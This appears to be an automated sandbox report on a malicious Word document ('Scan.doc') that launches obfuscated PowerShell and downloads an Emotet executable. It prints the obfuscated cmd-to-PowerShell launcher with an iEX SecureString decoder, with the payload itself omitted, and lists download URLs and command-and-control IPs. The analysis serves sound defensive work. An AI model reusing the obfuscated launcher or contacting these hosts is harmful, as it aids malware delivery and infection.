Pattern match: "www.microsoft.com"
Heuristic match: "amor.official.pw"
Heuristic match: "t-p-e.net"
Heuristic match: "$nsadasd = &('n'+'e'+'w-objec'+'t') random;$YYU = .('ne'+'w'+'-object') System.Ne" - source
- File/Memory
- relevance
- 10/10
-
System Security
-
Hooks API calls
- details
-
"SysFreeString@OLEAUT32.DLL" in "WINWORD.EXE"
"OleLoadFromStream@OLE32.DLL" in "WINWORD.EXE"
"VariantChangeType@OLEAUT32.DLL" in "WINWORD.EXE"
"SysAllocStringByteLen@OLEAUT32.DLL" in "WINWORD.EXE"
"VariantClear@OLEAUT32.DLL" in "WINWORD.EXE" - source
- Hook Detection
- relevance
- 10/10
-
Modifies proxy settings
- details
-
"powershell.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"powershell.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS") - source
- Registry Access
- relevance
- 10/10
-
Unusual Characteristics
-
Installs hooks/patches the running process
- details
-
"WINWORD.EXE" wrote bytes "e933effefecccc" to virtual address "0xFE301210" ("SysFreeString@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "b9238b267db0d301" to virtual address "0xE9232350" (part of module "OART.DLL")
"WINWORD.EXE" wrote bytes "e913b0e9ff" to virtual address "0xFD4550C0" ("OleLoadFromStream@OLE32.DLL")
"WINWORD.EXE" wrote bytes "bffdad267db0d301" to virtual address "0xE7F8D610" (part of module "MSO.DLL")
"WINWORD.EXE" wrote bytes "346ea7277db0d301" to virtual address "0x3FC23258" (part of module "WINWORD.EXE")
"WINWORD.EXE" wrote bytes "e94b9ffefecccccccccc" to virtual address "0xFE306230" ("VariantChangeType@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "e9abc0fefecc" to virtual address "0xFE304060" ("SysAllocStringByteLen@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "8c61dd267db0d301" to virtual address "0xF157DE48" (part of module "RICHED20.DLL")
"WINWORD.EXE" wrote bytes "48b8bc52b7e6fe070000ffe0" to virtual address "0x76DF9020" ("SetUnhandledExceptionFilter@KERNEL32.DLL")
"WINWORD.EXE" wrote bytes "6c5d89267db0d301" to virtual address "0xEB2371C0" (part of module "WWLIB.DLL")
"WINWORD.EXE" wrote bytes "c04e8b267db0d301" to virtual address "0xF1CAFA00" (part of module "GFX.DLL")
"WINWORD.EXE" wrote bytes "901bdc7f7db0d301" to virtual address "0xF24125D8" (part of module "MSPROOF7.DLL")
"WINWORD.EXE" wrote bytes "e933f0fefe" to virtual address "0xFE301180" ("VariantClear@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "ac68cf267db0d301" to virtual address "0xF16F0160" (part of module "MSPTLS.DLL")
"powershell.exe" wrote bytes "65488b042580150000" to virtual address "0xF0B9863C" (part of module "MSCORWKS.DLL")
"powershell.exe" wrote bytes "65488b042588150000" to virtual address "0xF0B98C0B" (part of module "MSCORWKS.DLL")
"powershell.exe" wrote bytes "654c8b1c2580150000" to virtual address "0xF0B974FB" (part of module "MSCORWKS.DLL")
"powershell.exe" wrote bytes "65488b042588150000" to virtual address "0xF0B98C4B" (part of module "MSCORWKS.DLL")
"powershell.exe" wrote bytes "654c8b1c2580150000" to virtual address "0xF0B9743F" (part of module "MSCORWKS.DLL")
"powershell.exe" wrote bytes "65488b042580150000" to virtual address "0xF0B97A44" (part of module "MSCORWKS.DLL") - source
- Hook Detection
- relevance
- 10/10
-
Invokes a process with a very long commandline
- details
- "cmd jTEAdZpiDaiYz qjMfFiOJizKUzshGiIowLoWFqV KkWYSZzkWIXn & %C^om^S^pEc% %C^om^S^pEc% /V /c set %btHkJMzDjjiWVZK%=WYrzozjmBIwYc&&set %var1%=p&&set %var2%=ow&&set %ArQWcsLIfSRKwwT%=DWcTblEVs&&set %var7%=!%var1%!&&set %sdJUjBQbairSAth%=hrFapszPTzlTFB&&set %var3%=er&&set %var8%=!%var2%!&&set %var4%=s&&set %PnudkPBnvRAjVPb%=DdvUuuz&&set %var5%=he&&set %var6%=ll&&!%var7%!!%var8%!!%var3%!!%var4%!!%var5%!!%var6%! "iEX(( [RuNTime.InteropsErviCEs.maRsHaL]::PTrTOsTRinGAUto( [rUNtImE.iNTERoPSERVIceS.marsHAL]::SecUReStriNGTOBSTR($('[encoded payload omitted]' |ConVerTTO-secuREStrING -KEy (146..169)) ))))" on 2018-2-28.11:17:29.463, "powershell "iEX(( [RuNTime.InteropsErviCEs.maRsHaL]::PTrTOsTRinGAUto( [rUNtImE.iNTERoPSERVIceS.marsHAL]::SecUReStriNGTOBSTR($('[encoded payload omitted]' |ConVerTTO-secuREStrING -KEy (146..169)) ))))" on 2018-2-28.11:17:29.667
- source
- Monitored Target
- relevance
- 10/10
File Details
Scan.doc
- Filename
- Scan.doc
- Size
- 221KiB (226304 bytes)
- Type
- doc office
- Description
- Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: nkqzhqbX, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Feb 27 05:23:00 2018, Last Saved Time/Date: Tue Feb 27 05:23:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 18, Security: 0
- Architecture
- WINDOWS
- SHA256
- 129168ef97cd243be323636ec3da04a59630e8eaa317549cc0e69445776447a6
- MD5
- d7ffedbfbfb2e8ea4807066577700b2a
- SHA1
- 05c90b961124c265d60114df7877fc9851b2634c
Classification (TrID)
- 54.2% (.DOC) Microsoft Word document
- 32.2% (.DOC) Microsoft Word document (old ver.)
- 13.5% (.) Generic OLE2 / Multistream Compound File
Hybrid Analysis
Analysed 5 processes in total (System Resource Monitor).
-
WINWORD.EXE
/n "C:\129168ef97cd243be323636ec3da04a59630e8eaa317549cc0e69445776447a6.doc"
(PID: 3592)
-
cmd.exe
cmd jTEAdZpiDaiYz qjMfFiOJizKUzshGiIowLoWFqV KkWYSZzkWIXn & %C^om^S^pEc% %C^om^S^pEc% /V /c set %btHkJMzDjjiWVZK%=WYrzozjmBIwYc&&set %var1%=p&&set %var2%=ow&&set %ArQWcsLIfSRKwwT%=DWcTblEVs&&set %var7%=!%var1%!&&set %sdJUjBQbairSAth%=hrFapszPTzlTFB&&set %var3%=er&&set %var8%=!%var2%!&&set %var4%=s&&set %PnudkPBnvRAjVPb%=DdvUuuz&&set %var5%=he&&set %var6%=ll&&!%var7%!!%var8%!!%var3%!!%var4%!!%var5%!!%var6%! "iEX(( [RuNTime.InteropsErviCEs.maRsHaL]::PTrTOsTRinGAUto( [rUNtImE.iNTERoPSERVIceS.marsHAL]::SecUReStriNGTOBSTR($('[encoded payload omitted]' |ConVerTTO-secuREStrING -KEy (146..169)) ))))
(PID: 3052)
-
powershell.exe
powershell "iEX(( [RuNTime.InteropsErviCEs.maRsHaL]::PTrTOsTRinGAUto( [rUNtImE.iNTERoPSERVIceS.marsHAL]::SecUReStriNGTOBSTR($('[encoded payload omitted]' |ConVerTTO-secuREStrING -KEy (146..169)) ))))
(PID: 2096)
-
195082.exe
(PID: 2840)
34/67
- 195082.exe (PID: 3360) 34/67
Network Analysis
DNS Requests
Domain | Address | Registrar | Country |
---|---|---|---|
www.utilitybillingsoftwares.com | 173.203.172.88 (TTL: 12990) | Wild West Domains, LLC; Organization: Shelly Webber Consulting; Name Server: NS.RACKSPACE.COM; Creation Date: Wed, 02 Jun 2010 21:19:30 GMT | United States |
www.erzotech.eu | 94.199.180.228 (TTL: 3599) | - | Hungary |
t-p-e.net | 217.160.0.130 (TTL: 2875) | 1&1 Internet SE; Organization: KHELIFA YACINE; Name Server: NS1114.UI-DNS.BIZ; Creation Date: Sat, 11 Jan 2014 12:00:48 GMT | Germany |
amor.official.pw | 69.175.93.166 (TTL: 10574) | - | United States |
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Details |
---|---|---|---|
173.203.172.88 | 80 TCP | powershell.exe PID: 2096 | United States |
69.175.93.166 | 80 TCP | powershell.exe PID: 2096 | United States |
217.160.0.130 | 80 TCP | powershell.exe PID: 2096 | Germany |
94.199.180.228 | 80 TCP | powershell.exe PID: 2096 | Hungary |
91.217.66.130 | 443 TCP | homenvidia.exe PID: 3456 | Ukraine |
HTTP Traffic
Endpoint | Request | URL | Data |
---|---|---|---|
173.203.172.88:80 (www.utilitybillingsoftwares.com) | GET | www.utilitybillingsoftwares.com/Yr13ok/ | GET /Yr13ok/ HTTP/1.1<br>Host: www.utilitybillingsoftwares.com<br>Connection: Keep-Alive |
69.175.93.166:80 (amor.official.pw) | GET | amor.official.pw/f3sqVF/ | GET /f3sqVF/ HTTP/1.1<br>Host: amor.official.pw<br>Connection: Keep-Alive |
217.160.0.130:80 (t-p-e.net) | GET | t-p-e.net/M8uZOL/ | GET /M8uZOL/ HTTP/1.1<br>Host: t-p-e.net<br>Connection: Keep-Alive |
94.199.180.228:80 (www.erzotech.eu) | GET | www.erzotech.eu/esimB50/ | GET /esimB50/ HTTP/1.1<br>Host: www.erzotech.eu<br>Connection: Keep-Alive |
91.217.66.130:443 | GET | 91.217.66.130/esimB50/ | GET /esimB50/ HTTP/1.1<br>Host: www.erzotech.eu<br>Connection: Keep-Alive |
Suricata Alerts
Event | Category | Description | SID |
---|---|---|---|
local -> 52.164.240.59:80 (TCP) | Misc activity | ET INFO Windows OS Submitting USB Metadata to Microsoft | 2025275 |
local -> 8.8.8.8:53 (UDP) | Potentially Bad Traffic | ET DNS Query to a *.pw domain - Likely Hostile | 2016778 |
local -> 69.175.93.166:80 (TCP) | Potentially Bad Traffic | ET INFO HTTP Request to a *.pw domain | 2016777 |
local -> 91.217.66.130:443 (TCP) | A Network Trojan was detected | ETPRO TROJAN W32/Emotet.v4 Checkin | 2827279 |
local -> 91.217.66.130:443 (TCP) | A Network Trojan was detected | ETPRO TROJAN W32/Emotet.v4 Checkin 2 | 2827580 |
local -> 91.217.66.130:443 (TCP) | A Network Trojan was detected | ETPRO TROJAN W32/Emotet.v4 Checkin 3 | 2828008 |
local -> 91.217.66.130:443 (TCP) | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) | 2013926 |
local -> 91.217.66.130:443 (TCP) | Potentially Bad Traffic | ET INFO GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1 | 2018358 |
local -> 52.164.240.59:80 (TCP) | Misc activity | ET INFO Windows OS Submitting USB Metadata to Microsoft | 2025275 |
local -> 52.164.240.59:80 (TCP) | Misc activity | ET INFO Windows OS Submitting USB Metadata to Microsoft | 2025275 |
local -> 52.164.240.59:80 (TCP) | Misc activity | ET INFO Windows OS Submitting USB Metadata to Microsoft | 2025275 |
94.199.180.228 -> local:56508 (TCP) | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP | 2018959 |
94.199.180.228 -> local:56508 (TCP) | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download | 2016538 |
94.199.180.228 -> local:56508 (TCP) | Misc activity | ET INFO EXE - Served Attached HTTP | 2014520 |
Extracted Files
-
Malicious 1
-
-
195082.exe
- Size
- 132KiB (135168 bytes)
- Type
- peexe executable
- Description
- PE32 executable (GUI) Intel 80386, for MS Windows
- AV Scan Result
- Labeled as "Trojan.Generic" (34/67)
- Runtime Process
- 195082.exe (PID: 2840)
- MD5
- ee8ecae6ff9c0e9c0c64a9ac8bc68b28
- SHA1
- 9b50606a0a7d4e7de61e008c7418e5c2e4e7514f
- SHA256
- 0fc4143af0aa01b02806484b5f289884570eab7821fa38480f22d53de57752fe
-
-
Clean 1
-
-
~$9168ef97cd243be323636ec3da04a59630e8eaa317549cc0e69445776447a6.doc
- Size
- 162B (162 bytes)
- Type
- data
- AV Scan Result
- 0/59
- Runtime Process
- WINWORD.EXE (PID: 3592)
- MD5
- 16cf07b6d6f758652122f5c01b561b38
- SHA1
- 5ef543ce193044191392e2b8e887a300c52baf74
- SHA256
- 3882a3e04d6cf66707b31c8cb14a7c9fe512d10dd355f97a37e8666270f6e17d
-
-
Informative 5
-
-
129168ef97cd243be323636ec3da04a59630e8eaa317549cc0e69445776447a6.LNK
- Size
- 733B (733 bytes)
- Type
- lnk
- Description
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Jan 31 09:15:39 2018, mtime=Wed Jan 31 09:15:39 2018, atime=Wed Jan 31 09:16:04 2018, length=226304, window=hide
- Runtime Process
- WINWORD.EXE (PID: 3592)
- MD5
- 614f1e0a25aeabf5662c0cb63f5ceb3a
- SHA1
- a0152729e4407cb0b4d6e56726d8f80b5e27906b
- SHA256
- 7c932068f895d4d38e69fb1359f7511eb7ca1eb030161774bd8418562c47306a
-
index.dat
- Size
- 224B (224 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3592)
- MD5
- c74b075f627e6dac016707e8738818a4
- SHA1
- 002fb229fdd21285fea544d6584992d1968a9635
- SHA256
- b9bf0cc87e4d9b46af221b54fb924062d8b1cff3474bd1d7431ef0f6b767b3cf
-
~$Normal.dotm
- Size
- 162B (162 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3592)
- MD5
- 16cf07b6d6f758652122f5c01b561b38
- SHA1
- 5ef543ce193044191392e2b8e887a300c52baf74
- SHA256
- 3882a3e04d6cf66707b31c8cb14a7c9fe512d10dd355f97a37e8666270f6e17d
-
8TCMB5ZGMHB3S9U7XP4L.temp
- Size
- 7.8KiB (8016 bytes)
- Type
- data
- Runtime Process
- powershell.exe (PID: 2096)
- MD5
- 0ec3597603855b71f181368c8be27d5b
- SHA1
- e586ca08889c31a17a392a84047793a685b816fc
- SHA256
- 7aa6c4512e69d776f41e7db3c44782c106256a0e511588eb8ce4f424545d4144
-
~WRS{6F053C44-FAC4-4CB6-B75C-D30842EE3494}.tmp
- Size
- 1KiB (1024 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3592)
- MD5
- 5d4d94ee7e06bbb0af9584119797b23a
- SHA1
- dbb111419c704f116efa8e72471dd83e86e49677
- SHA256
- 4826c0d860af884d3343ca6460b0006a7a2ce7dbccc4d743208585d997cc5fd1
-
Notifications
-
Runtime
- Added comment to Virus Total report
- Not all IP/URL string resources were checked online
- Not all sources for indicator ID "api-55" are available in the report
- Not all sources for indicator ID "api-70" are available in the report
- Not all sources for indicator ID "hooks-8" are available in the report
- Not all sources for indicator ID "mutant-0" are available in the report